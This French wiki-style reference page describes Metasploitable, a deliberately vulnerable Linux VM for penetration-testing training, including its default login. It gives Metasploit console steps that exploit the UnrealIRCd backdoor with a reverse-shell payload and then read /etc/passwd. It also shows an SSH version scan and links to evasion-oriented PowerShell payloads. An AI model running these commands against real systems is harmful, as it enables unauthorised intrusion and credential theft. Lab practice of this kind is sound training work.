Metasploitable
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Cible d'entraînement volontairement vulnérable |
| Éditeur | Rapid7 |
| Contexte | Metasploit |
| Voir aussi | Msfconsole · Meterpreter |
Metasploitable est une machine virtuelle Linux volontairement vulnérable, destinée à l'entraînement au test d'intrusion.
- Téléchargement : http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
- Identifiants par défaut :
msfadmin/msfadmin - Documentation : https://community.rapid7.com/docs/DOC-1875
Exemple : UnrealIRCd backdoor
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST 192.168.198.145
set payload cmd/unix/reverse
run
whoami
cat /etc/passwd
Scanner de version
search scanner
use auxiliary/scanner/ssh/ssh_version
set RHOSTS <IP>
exploit
- Payloads PowerShell : https://www.veil-evasion.com/powershell-payloads/